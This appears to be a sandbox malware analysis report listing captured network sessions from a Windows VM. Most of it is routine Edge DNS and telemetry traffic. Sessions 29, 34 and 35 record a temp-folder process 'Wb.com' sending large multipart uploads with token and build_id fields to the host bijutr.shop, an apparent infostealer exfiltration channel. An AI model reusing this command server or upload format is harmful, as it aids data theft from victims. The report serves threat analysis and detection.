Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49901 | 172.64.41.3 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:04 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 16:15:05 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 16:15:05 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f69a5f878da18c0-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49898 | 172.64.41.3 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:04 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 16:15:05 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 16:15:05 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f69a5f88f090f79-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 49902 | 172.64.41.3 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:04 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 16:15:04 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-23 16:15:05 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 16:15:05 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f69a5f88fb2de9a-EWR
alt-svc: h3=":443"; ma=86400
2024-12-23 16:15:05 UTC | 468 | IN | Data Ascii: wwwgstaticcom#)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 49906 | 162.159.61.3 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:04 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 16:15:04 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-23 16:15:05 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 16:15:05 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f69a5f888bbf78f-EWR
alt-svc: h3=":443"; ma=86400
2024-12-23 16:15:05 UTC | 468 | IN | Data Ascii: wwwgstaticcom*#)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 49907 | 162.159.61.3 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:04 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 16:15:04 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-23 16:15:05 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 16:15:05 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f69a5f8a9ff43b2-EWR
alt-svc: h3=":443"; ma=86400
2024-12-23 16:15:05 UTC | 468 | IN | Data Ascii: wwwgstaticcom$Hc)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      27192.168.2.649908172.64.41.34437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
2024-12-23 16:15:05 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:05 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a5f8bf0c4232-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 25 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom% c)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 49900 | 172.217.19.225 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:05 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-23 16:15:06 UTC | 562 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Content-Length: 154477
                                                                                                                                                                                                                                                                                                      X-GUploader-UploadID: AFiumC7CLbrFzeFTHCfjQVYAi0164GCwE3ln9PZrFT8ioABvqJLcG49E9w0QiSoij882FZ0m
                                                                                                                                                                                                                                                                                                      X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                      Server: UploadServer
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                                      Expires: Tue, 23 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                      Age: 1011
                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                      ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                      Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 49927 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:05 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HVAI58YMYMYU379R9HDB
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 68733
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------HVAI58YMYMYU379R9HDBContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------HVAI58YMYMYU379R9HDBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------HVAI58YMYMYU379R9HDBCont
2024-12-23 16:15:07 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:07 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
2024-12-23 16:15:07 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 49929 | 172.64.41.3 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:06 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
2024-12-23 16:15:06 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a60098a71851-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2b 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom+#)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 49930 | 162.159.61.3 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:06 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
2024-12-23 16:15:06 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a6009ef67cb1-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1d 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomHc)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 49931 | 172.64.41.3 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:06 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
2024-12-23 16:15:06 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-23 16:15:06 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 16:15:06 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f69a60128e10fab-EWR
alt-svc: h3=":443"; ma=86400
2024-12-23 16:15:06 UTC | 468 | IN | Data Ascii: wwwgstaticcomP#)


Session ID | Source IP | Source Port | Destination IP | Destination Port
33 | 192.168.2.6 | 49932 | 20.198.119.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:07 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: DmElj2s84UKwNZTR.1Context: 6af7d21f27cccd11
2024-12-23 16:15:07 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-23 16:15:07 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: DmElj2s84UKwNZTR.2Context: 6af7d21f27cccd11<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
2024-12-23 16:15:07 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: DmElj2s84UKwNZTR.3Context: 6af7d21f27cccd11<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-23 16:15:08 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-23 16:15:08 UTC | 58 | IN | Data Ascii: MS-CV: vcBr+Uzsck6GSdNnTxd5+w.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 49943 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:07 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----XBAIMGLN7QIM7YCTJWLN
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:15:07 UTC | 16355 | OUT | Data Ascii: ------XBAIMGLN7QIM7YCTJWLNContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------XBAIMGLN7QIM7YCTJWLNContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------XBAIMGLN7QIM7YCTJWLNCont
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:09 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      35192.168.2.649947188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AS2N7900ZU3EUA1VAI5F
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 393697
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------AS2N7900ZU3EUA1VAI5FCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:11 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      36192.168.2.6499213.160.188.504437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:11 UTC925OUTGET /b?rn=1734970511307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=264DEDAF8CF36A9502DCF8F18D816BBC&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
